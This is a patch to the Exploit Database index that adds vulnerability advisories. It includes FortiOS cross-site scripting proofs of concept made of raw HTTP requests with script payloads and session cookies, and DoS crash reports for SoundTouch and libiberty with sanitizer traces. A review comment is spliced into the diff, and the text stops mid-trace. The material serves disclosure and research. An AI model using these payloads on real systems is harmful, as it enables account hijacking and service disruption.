From fb7bed6364479e9f046b4ba41877eda131df7233 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 29 Jul 2017 05:01:21 +0000 Subject: [PATCH] DB: 2017-07-29 6 new exploits GNU libiberty - Buffer Overflow SoundTouch 1.9.2 - Multiple Vulnerabilities LAME 3.99.5 - Multiple Vulnerabilities libjpeg-turbo 1.5.1 - Denial of Service Joomla! Component com_ccnewsletter - Directory Traversal Joomla! Component CCNewsLetter - Directory Traversal Joomla! Component com_ccnewsletter - Local File Inclusion Joomla! Component CCNewsLetter - Local File Inclusion Joomla! Component CCNewsLetter 2.1.9 - 'sbid' Parameter SQL Injection FortiOS < 5.6.0 - Cross-Site Scripting --- files.csv | 10 +- platforms/hardware/webapps/42388.txt | 168 +++++++++++++++++++++ platforms/linux/dos/42386.txt | 16 ++ platforms/linux/dos/42389.txt | 210 +++++++++++++++++++++++++++ platforms/linux/dos/42390.txt | 191 ++++++++++++++++++++++++ platforms/linux/dos/42391.txt | 141 ++++++++++++++++++ platforms/php/webapps/42387.txt | 44 ++++++ 7 files changed, 778 insertions(+), 2 deletions(-) create mode 100755 platforms/hardware/webapps/42388.txt create mode 100755 platforms/linux/dos/42386.txt create mode 100755 platforms/linux/dos/42389.txt create mode 100755 platforms/linux/dos/42390.txt create mode 100755 platforms/linux/dos/42391.txt create mode 100755 platforms/php/webapps/42387.txt diff --git a/files.csv b/files.csv index f376482aa..a37229cbe 100644 --- a/files.csv +++ b/files.csv 
@@ -5625,6 +5625,10 @@ id,file,description,date,author,platform,type,port
 42375,platforms/multiple/dos/42375.html,"WebKit JSC - 'JSArray::appendMemcpy' Uninitialized Memory Copy",2017-07-25,"Google Security Research",multiple,dos,0
 42376,platforms/multiple/dos/42376.html,"WebKit JSC - 'ArgumentsEliminationPhase::transform' Incorrect LoadVarargs Handling",2017-07-25,"Google Security Research",multiple,dos,0
 42377,platforms/multiple/dos/42377.txt,"WebKit JSC - 'ObjectPatternNode::appendEntry' Stack Use-After-Free",2017-07-25,"Google Security Research",multiple,dos,0
+42386,platforms/linux/dos/42386.txt,"GNU libiberty - Buffer Overflow",2017-07-27,"Marcel Böhme",linux,dos,0
+42389,platforms/linux/dos/42389.txt,"SoundTouch 1.9.2 - Multiple Vulnerabilities",2017-07-28,qflb.wu,linux,dos,0
+42390,platforms/linux/dos/42390.txt,"LAME 3.99.5 - Multiple Vulnerabilities",2017-07-28,qflb.wu,linux,dos,0
+42391,platforms/linux/dos/42391.txt,"libjpeg-turbo 1.5.1 - Denial of Service",2017-07-28,qflb.wu,linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -22872,11 +22876,11 @@ id,file,description,date,author,platform,type,port
 11270,platforms/php/webapps/11270.txt,"Joomla! Component VirtueMart Module Customers_who_bought - SQL Injection",2010-01-27,B-HUNT3|2,php,webapps,0
 11271,platforms/php/webapps/11271.txt,"Joomla! Component com_virtuemart - order_status_id SQL Injection",2010-01-27,B-HUNT3|2,php,webapps,0
 11274,platforms/php/webapps/11274.pl,"Woltlab Burningboard Addon Kleinanzeigenmarkt - SQL Injection",2009-12-21,fred777,php,webapps,0
-11277,platforms/php/webapps/11277.txt,"Joomla! Component com_ccnewsletter - Directory Traversal",2010-01-28,B-HUNT3|2,php,webapps,0
+11277,platforms/php/webapps/11277.txt,"Joomla! Component CCNewsLetter - Directory Traversal",2010-01-28,B-HUNT3|2,php,webapps,0
 11278,platforms/php/webapps/11278.txt,"Novaboard 1.1.2 - SQL Injection",2010-01-28,Delibey,php,webapps,0
 11279,platforms/php/webapps/11279.txt,"Joomla! Component com_kunena - Blind SQL Injection",2010-01-28,B-HUNT3|2,php,webapps,0
 11280,platforms/php/webapps/11280.txt,"Joomla! Component jVideoDirect - Blind SQL Injection",2010-01-28,B-HUNT3|2,php,webapps,0
-11282,platforms/php/webapps/11282.txt,"Joomla! Component com_ccnewsletter - Local File Inclusion",2010-01-28,AtT4CKxT3rR0r1ST,php,webapps,0
+11282,platforms/php/webapps/11282.txt,"Joomla! Component CCNewsLetter - Local File Inclusion",2010-01-28,AtT4CKxT3rR0r1ST,php,webapps,0
 11284,platforms/php/webapps/11284.txt,"PHP Product Catalog - Cross-Site Request Forgery (Change Administrator Password)",2010-01-29,bi0,php,webapps,0
 11286,platforms/php/webapps/11286.txt,"Joomla! Component Jreservation - Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0
 11287,platforms/php/webapps/11287.txt,"Joomla! Component JE Quiz - 'eid' Parameter Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0
@@ -38186,3 +38190,5 @@ id,file,description,date,author,platform,type,port
 42379,platforms/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps,0
 42383,platforms/php/webapps/42383.html,"Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)",2017-07-26,shinnai,php,webapps,0
 42381,platforms/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",php,webapps,0
+42387,platforms/php/webapps/42387.txt,"Joomla! Component CCNewsLetter 2.1.9 - 'sbid' Parameter SQL Injection",2017-07-27,"Shahab Shamsi",php,webapps,0
+42388,platforms/hardware/webapps/42388.txt,"FortiOS < 5.6.0 - Cross-Site Scripting",2017-07-28,patryk_bogdan,hardware,webapps,0
diff --git a/platforms/hardware/webapps/42388.txt b/platforms/hardware/webapps/42388.txt
new file mode 100755
index 000000000..2a5147ffd
--- /dev/null
+++ b/platforms/hardware/webapps/42388.txt
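Review bot: The description on the new 42388 line, `"FortiOS < 5.6.0 - Cross-Site Scripting"`, understates the affected range: the advisory it indexes (platforms/hardware/webapps/42388.txt, added later in this commit) is titled "FortiOS <= 5.6.0", lists 5.6.0 itself as affected for all three CVEs, and names 5.6.1 as the fixed release. Anyone filtering the index by version would wrongly conclude 5.6.0 is unaffected. Suggest `42388,platforms/hardware/webapps/42388.txt,"FortiOS <= 5.6.0 - Multiple Cross-Site Scripting Vulnerabilities",2017-07-28,patryk_bogdan,hardware,webapps,0`.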
@@ -0,0 +1,168 @@ +# Title: FortiOS <= 5.6.0 Multiple XSS Vulnerabilities +# Vendor: Fortinet (www.fortinet.com) +# CVE: CVE-2017-3131, CVE-2017-3132, CVE-2017-3133 +# Date: 28.07.2016 +# Author: Patryk Bogdan (@patryk_bogdan) + +Affected FortiNet products: +* CVE-2017-3131 : FortiOS versions 5.4.0 to 5.6.0 +* CVE-2017-3132 : FortiOS versions upto 5.6.0 +* CVE-2017-3133 : FortiOS versions upto 5.6.0 + +Fix: +Upgrade to FortiOS version 5.6.1 + +Video PoC (add admin): +https://youtu.be/fcpLStCD61Q + +Vendor advisory: +https://fortiguard.com/psirt/FG-IR-17-104 + + +Vulns: + +1. XSS in WEB UI - Applications: + +URL: +https://192.168.1.99/ng/fortiview/app/15832" onmouseover=alert('XSS') x="y + +Http request: +GET /ng/fortiview/app/15832%22%20onmouseover=alert('XSS')%20x=%22y HTTP/1.1 +Host: 192.168.1.99 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Cookie: APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AZxzmYv40KrD1JvCdcctTzmuS+OEd08y+4Vh54tq%2Fap2ej%2F1gJfbaindJ5r4wDXZh%0A4q%2FfgVCdTfMFn+Mr6Xj5Og%3D%3D%0A%26AuthHash%3D9+TbiFXbk+Qkks0pPlkbNDx2L1EA%0A"; ccsrftoken_573485771="5424C6B3842788A23E3413307F1DFFC5"; ccsrftoken="5424C6B3842788A23E3413307F1DFFC5"; VDOM_573485771=root; csrftoken_573485771=da85e919f71a610c45aff174b23c7a10 +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 + +Http response: +HTTP/1.1 200 OK +Date: Thu, 23 Mar 2017 12:07:47 GMT +Server: xxxxxxxx-xxxxx +Cache-Control: no-cache +Pragma: no-cache +Expires: -1 +Vary: Accept-Encoding +Content-Length: 6150 +Connection: close +Content-Type: text/html; charset=utf-8 +X-Frame-Options: SAMEORIGIN +Content-Security-Policy: frame-ancestors 'self' +X-UA-Compatible: IE=Edge +(...) + +(...) + + +2. 
XSS in WEB UI - Assign Token: + +URL: +https://192.168.1.99/p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Cscript%3E + +Http request: +GET /p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E%3Cscript%3E HTTP/1.1 +Host: 192.168.1.99 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Cookie: APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0ALuXSfDjrp0Gel8F8TeKlBgC3kk4P1mhdELHr2Cicb3Zb6hBUnT9ZZnjXC44Dc7bD%0Ae2ymJG%2FgbHFa+4N9AVDIrg%3D%3D%0A%26AuthHash%3DMyJMLA32ueruHIEKia2eb9BWi8oA%0A"; ccsrftoken_573485771="314A25687F6B2075F9413405575D477"; ccsrftoken="314A25687F6B2075F9413405575D477"; VDOM_573485771=root; csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160 +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 + +Http response: +HTTP/1.1 200 OK +Date: Thu, 23 Mar 2017 13:39:17 GMT +Server: xxxxxxxx-xxxxx +Content-Security-Policy: frame-ancestors 'self' +Expires: Thu, 23 Mar 2017 13:39:17 GMT +Vary: Cookie,Accept-Encoding +Last-Modified: Thu, 23 Mar 2017 13:39:17 GMT +X-UA-Compatible: IE=Edge +Cache-Control: max-age=0 +X-FRAME-OPTIONS: SAMEORIGIN +Set-Cookie: csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160; expires=Thu, 22-Mar-2018 13:39:17 GMT; Max-Age=31449600; Path=/ +Connection: close +Content-Type: text/html; charset=utf-8 +Content-Length: 3485 +(...) + + +(...) + + +3. 
Stored XSS in WEB UI - Replacement Messages: + +#1 - Http request: +POST /p/system/replacemsg/edit/sslvpn/sslvpn-login/ HTTP/1.1 +Host: 192.168.1.99 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: */* +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Referer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/ +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff +X-Requested-With: XMLHttpRequest +Content-Length: 125 +Cookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A"; ccsrftoken_573485771="592068D7C2B5BDB7A91833DB6A512C14"; ccsrftoken="592068D7C2B5BDB7A91833DB6A512C14"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D +DNT: 1 +Connection: close + +csrfmiddlewaretoken=d58f666c794024295cece8c5b8b6a3ff&buffer=ABC%3C%2Ftextarea%3E%0A%3Cscript%3Ealert('XSS')%3C%2Fscript%3E%0A + +#1 - Http response: +HTTP/1.1 302 FOUND +Date: Thu, 23 Mar 2017 15:36:33 GMT +Server: xxxxxxxx-xxxxx +Content-Security-Policy: frame-ancestors 'self' +Expires: Thu, 23 Mar 2017 15:36:33 GMT +Last-Modified: Thu, 23 Mar 2017 15:36:33 GMT +Cache-Control: max-age=0 +X-FRAME-OPTIONS: SAMEORIGIN +X-UA-Compatible: IE=Edge +Set-Cookie: EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D; Path=/ +Location: 
https://192.168.1.99/p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ +Connection: close +Content-Type: text/html; charset=utf-8 +Content-Length: 0 + +#2 - Http request: +GET /p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ HTTP/1.1 +Host: 192.168.1.99 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: */* +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Referer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/ +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff +X-Requested-With: XMLHttpRequest +Cookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A"; ccsrftoken_573485771="592068D7C2B5BDB7A91833DB6A512C14"; ccsrftoken="592068D7C2B5BDB7A91833DB6A512C14"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D +DNT: 1 +Connection: close + +#2 - Http response: +HTTP/1.1 200 OK +Date: Thu, 23 Mar 2017 15:36:33 GMT +Server: xxxxxxxx-xxxxx +Content-Security-Policy: frame-ancestors 'self' +Expires: Thu, 23 Mar 2017 15:36:33 GMT +Vary: Cookie,Accept-Encoding +Last-Modified: Thu, 23 Mar 2017 15:36:33 GMT +X-UA-Compatible: IE=Edge +Cache-Control: max-age=0 +X-FRAME-OPTIONS: SAMEORIGIN +Set-Cookie: csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; expires=Thu, 22-Mar-2018 15:36:33 GMT; Max-Age=31449600; Path=/ +Connection: close +Content-Type: text/html; 
charset=utf-8 +Content-Length: 70940 +(...) +
+
+ + +(...) \ No newline at end of file diff --git a/platforms/linux/dos/42386.txt b/platforms/linux/dos/42386.txt new file mode 100755 index 000000000..94b64a07a --- /dev/null +++ b/platforms/linux/dos/42386.txt @@ -0,0 +1,16 @@ +Source: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=69687 + + +The attached program binary causes a buffer overflow in cplus-dem.c when it tries to demangle specially crafted function arguments in the binary. Both the buffer size as well as the buffer content are controlled from the binary. + +objdump -x -C +nm -C + +Tested on the following configurations +* 2.6.32-573.7.1.el6.x86_64 #1 SMP Tue Sep 22 22:00:00 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux +* 4.1.12-boot2docker #1 SMP Tue Nov 3 06:03:36 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux +* Binutils versions: 2.20 and 2.26 + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42386.zip diff --git a/platforms/linux/dos/42389.txt b/platforms/linux/dos/42389.txt new file mode 100755 index 000000000..13ed5a6af --- /dev/null +++ b/platforms/linux/dos/42389.txt 
@@ -0,0 +1,210 @@
+SoundTouch multiple vulnerabilities
+================
+Author : qflb.wu
+===============
+
+
+Introduction:
+=============
+SoundTouch is an open-source audio processing library for changing the Tempo, Pitch and Playback Rates of audio streams or audio files. The library additionally supports estimating stable beats-per-minute rates for audio tracks.
+
+
+Affected version:
+=====
+1.9.2
+
+
+Vulnerability Description:
+==========================
+1.
+the TDStretch::processSamples function in source/SoundTouch/TDStretch.cpp in SoundTouch 1.9.2 can cause a denial of service(infinite loop and CPU consumption) via a crafted wav file.
+
+
+./soundstretch SoundTouch_1.9.2_infinite_loop.wav out
+
+
+POC:
+SoundTouch_1.9.2_infinite_loop.wav
+CVE:
+CVE-2017-9258
+
+
+2.
+the TDStretch::acceptNewOverlapLength function in source/SoundTouch/TDStretch.cpp in SoundTouch 1.9.2 can cause a denial of service(memory allocation error and application crash) via a crafted wav file.
+
+
+./soundstretch SoundTouch_1.9.2_memory_allocation_error.wav out
+
+
+==87485==ERROR: AddressSanitizer failed to allocate 0x16103e000 (5922611200) bytes of LargeMmapAllocator: 12
+==87485==Process memory map follows:
+0x000000400000-0x0000004c7000/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch
+0x0000006c7000-0x0000006c8000/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch
+0x0000006c8000-0x0000006ca000/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch
+0x0000006ca000-0x000001b0e000
+0x00007fff7000-0x00008fff7000
+0x00008fff7000-0x02008fff7000
+0x02008fff7000-0x10007fff8000
+0x600000000000-0x603000000000
+0x603000000000-0x603000010000
+0x603000010000-0x604000000000
+0x604000000000-0x604000010000
+0x604000010000-0x608000000000
+0x608000000000-0x608000010000
+0x608000010000-0x60b000000000
+0x60b000000000-0x60b000010000
+0x60b000010000-0x60e000000000
+0x60e000000000-0x60e000010000
+0x60e000010000-0x611000000000
+0x611000000000-0x611000010000 +0x611000010000-0x615000000000 +0x615000000000-0x615000020000 +0x615000020000-0x616000000000 +0x616000000000-0x616000020000 +0x616000020000-0x619000000000 +0x619000000000-0x619000020000 +0x619000020000-0x61e000000000 +0x61e000000000-0x61e000020000 +0x61e000020000-0x621000000000 +0x621000000000-0x621000020000 +0x621000020000-0x624000000000 +0x624000000000-0x624000020000 +0x624000020000-0x640000000000 +0x640000000000-0x640000003000 +0x7fdf6b253000-0x7fdf6d756000 +0x7fdf6d756000-0x7fdf6d914000/lib/x86_64-linux-gnu/libc-2.19.so +0x7fdf6d914000-0x7fdf6db13000/lib/x86_64-linux-gnu/libc-2.19.so +0x7fdf6db13000-0x7fdf6db17000/lib/x86_64-linux-gnu/libc-2.19.so +0x7fdf6db17000-0x7fdf6db19000/lib/x86_64-linux-gnu/libc-2.19.so +0x7fdf6db19000-0x7fdf6db1e000 +0x7fdf6db1e000-0x7fdf6db34000/lib/x86_64-linux-gnu/libgcc_s.so.1 +0x7fdf6db34000-0x7fdf6dd33000/lib/x86_64-linux-gnu/libgcc_s.so.1 +0x7fdf6dd33000-0x7fdf6dd34000/lib/x86_64-linux-gnu/libgcc_s.so.1 +0x7fdf6dd34000-0x7fdf6de1a000/usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.19 +0x7fdf6de1a000-0x7fdf6e019000/usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.19 +0x7fdf6e019000-0x7fdf6e021000/usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.19 +0x7fdf6e021000-0x7fdf6e023000/usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.19 +0x7fdf6e023000-0x7fdf6e038000 +0x7fdf6e038000-0x7fdf6e03b000/lib/x86_64-linux-gnu/libdl-2.19.so +0x7fdf6e03b000-0x7fdf6e23a000/lib/x86_64-linux-gnu/libdl-2.19.so +0x7fdf6e23a000-0x7fdf6e23b000/lib/x86_64-linux-gnu/libdl-2.19.so +0x7fdf6e23b000-0x7fdf6e23c000/lib/x86_64-linux-gnu/libdl-2.19.so +0x7fdf6e23c000-0x7fdf6e243000/lib/x86_64-linux-gnu/librt-2.19.so +0x7fdf6e243000-0x7fdf6e442000/lib/x86_64-linux-gnu/librt-2.19.so +0x7fdf6e442000-0x7fdf6e443000/lib/x86_64-linux-gnu/librt-2.19.so +0x7fdf6e443000-0x7fdf6e444000/lib/x86_64-linux-gnu/librt-2.19.so +0x7fdf6e444000-0x7fdf6e45d000/lib/x86_64-linux-gnu/libpthread-2.19.so +0x7fdf6e45d000-0x7fdf6e65c000/lib/x86_64-linux-gnu/libpthread-2.19.so 
+0x7fdf6e65c000-0x7fdf6e65d000/lib/x86_64-linux-gnu/libpthread-2.19.so +0x7fdf6e65d000-0x7fdf6e65e000/lib/x86_64-linux-gnu/libpthread-2.19.so +0x7fdf6e65e000-0x7fdf6e662000 +0x7fdf6e662000-0x7fdf6e767000/lib/x86_64-linux-gnu/libm-2.19.so +0x7fdf6e767000-0x7fdf6e966000/lib/x86_64-linux-gnu/libm-2.19.so +0x7fdf6e966000-0x7fdf6e967000/lib/x86_64-linux-gnu/libm-2.19.so +0x7fdf6e967000-0x7fdf6e968000/lib/x86_64-linux-gnu/libm-2.19.so +0x7fdf6e968000-0x7fdf6e9bd000/usr/local/lib/libSoundTouch.so.1.0.0 +0x7fdf6e9bd000-0x7fdf6ebbd000/usr/local/lib/libSoundTouch.so.1.0.0 +0x7fdf6ebbd000-0x7fdf6ebbe000/usr/local/lib/libSoundTouch.so.1.0.0 +0x7fdf6ebbe000-0x7fdf6ebc1000/usr/local/lib/libSoundTouch.so.1.0.0 +0x7fdf6ebc1000-0x7fdf6ebe4000/lib/x86_64-linux-gnu/ld-2.19.so +0x7fdf6edb1000-0x7fdf6edc8000 +0x7fdf6edca000-0x7fdf6edd7000 +0x7fdf6edda000-0x7fdf6ede3000 +0x7fdf6ede3000-0x7fdf6ede4000/lib/x86_64-linux-gnu/ld-2.19.so +0x7fdf6ede4000-0x7fdf6ede5000/lib/x86_64-linux-gnu/ld-2.19.so +0x7fdf6ede5000-0x7fdf6ede6000 +0x7ffcb0503000-0x7ffcb0524000[stack] +0x7ffcb05a4000-0x7ffcb05a6000[vvar] +0x7ffcb05a6000-0x7ffcb05a8000[vdso] +0xffffffffff600000-0xffffffffff601000[vsyscall] +==87485==End of process memory map. 
+==87485==AddressSanitizer CHECK failed: /build/buildd/llvm-toolchain-3.4-3.4/projects/compiler-rt/lib/sanitizer_common/sanitizer_posix.cc:68 "(("unable to mmap" && 0)) != (0)" (0x0, 0x0) + #0 0x46da6f in __asan::AsanCheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x46da6f) + #1 0x4732d1 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x4732d1) + #2 0x477b9e in __sanitizer::MmapOrDie(unsigned long, char const*) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x477b9e) + #3 0x433278 in __sanitizer::LargeMmapAllocator<__asan::AsanMapUnmapCallback>::Allocate(__sanitizer::AllocatorStats*, unsigned long, unsigned long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x433278) + #4 0x42f2bb in __asan::Allocate(unsigned long, unsigned long, __sanitizer::StackTrace*, __asan::AllocType, bool) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x42f2bb) + #5 0x46824d in operator new[](unsigned long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x46824d) + #6 0x7fdf6e993d8e in soundtouch::TDStretch::acceptNewOverlapLength(int) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:724 + #7 0x7fdf6e993d8e in soundtouch::TDStretch::calculateOverlapLength(int) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:1008 + #8 0x7fdf6e9901f0 in soundtouch::TDStretch::setParameters(int, int, int, int) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:158 + #9 0x7fdf6e998910 in soundtouch::TDStretch::setChannels(int) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:599 + #10 0x47f825 in setup(soundtouch::SoundTouch*, WavInFile const*, RunParameters const*) /home/a/Downloads/soundtouch/source/SoundStretch/main.cpp:127 + #11 0x47f825 in main 
/home/a/Downloads/soundtouch/source/SoundStretch/main.cpp:310 + #12 0x7fdf6d777f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) + #13 0x47dbac in _start (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x47dbac) + + + POC: + SoundTouch_1.9.2_infinite_loop.wav + CVE: + CVE-2017-9259 + + + 3. + the TDStretchSSE::calcCrossCorr function in source/SoundTouch/sse_optimized.cpp in SoundTouch 1.9.2 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted wav file. + + +./soundstretch SoundTouch_1.9.2_heap_buffer_overflow.wav out + + +==87598==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x625000007110 at pc 0x7f5076e3c3dc bp 0x7ffda7a42e10 sp 0x7ffda7a42e08 +READ of size 16 at 0x625000007110 thread T0 + #0 0x7f5076e3c3db in soundtouch::TDStretchSSE::calcCrossCorr(float const*, float const*, double&) /home/a/Downloads/soundtouch/source/SoundTouch/sse_optimized.cpp:120:35 + #1 0x7f5076e1f0f9 in soundtouch::TDStretch::seekBestOverlapPositionFull(float const*) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:305 + #2 0x7f5076e1ee2c in soundtouch::TDStretch::seekBestOverlapPosition(float const*) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:258 + #3 0x7f5076e21e88 in soundtouch::TDStretch::processSamples() /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:659 + #4 0x7f5076e12893 in soundtouch::FIFOSamplePipe::moveSamples(soundtouch::FIFOSamplePipe&) /home/a/Downloads/soundtouch/source/SoundTouch/../../include/FIFOSamplePipe.h:88 + #5 0x7f5076e12893 in soundtouch::SoundTouch::putSamples(float const*, unsigned int) /home/a/Downloads/soundtouch/source/SoundTouch/SoundTouch.cpp:334 + #6 0x480f5e in process(soundtouch::SoundTouch*, WavInFile*, WavOutFile*) /home/a/Downloads/soundtouch/source/SoundStretch/main.cpp:200 + #7 0x480f5e in main /home/a/Downloads/soundtouch/source/SoundStretch/main.cpp:314 + #8 0x7f5075c00f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) + #9 0x47dbac in _start 
(/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x47dbac) + + +0x625000007110 is located 0 bytes to the right of 8208-byte region [0x625000005100,0x625000007110) +allocated by thread T0 here: + #0 0x468209 in operator new[](unsigned long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x468209) + #1 0x7f5076e055db in soundtouch::FIFOSampleBuffer::ensureCapacity(unsigned int) /home/a/Downloads/soundtouch/source/SoundTouch/FIFOSampleBuffer.cpp:174 + + +SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/soundtouch/source/SoundTouch/sse_optimized.cpp:120 soundtouch::TDStretchSSE::calcCrossCorr(float const*, float const*, double&) +Shadow bytes around the buggy address: + 0x0c4a7fff8dd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c4a7fff8de0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c4a7fff8df0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c4a7fff8e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c4a7fff8e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c4a7fff8e20: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c4a7fff8e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c4a7fff8e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c4a7fff8e50: fa fa fa fa fa fa fa 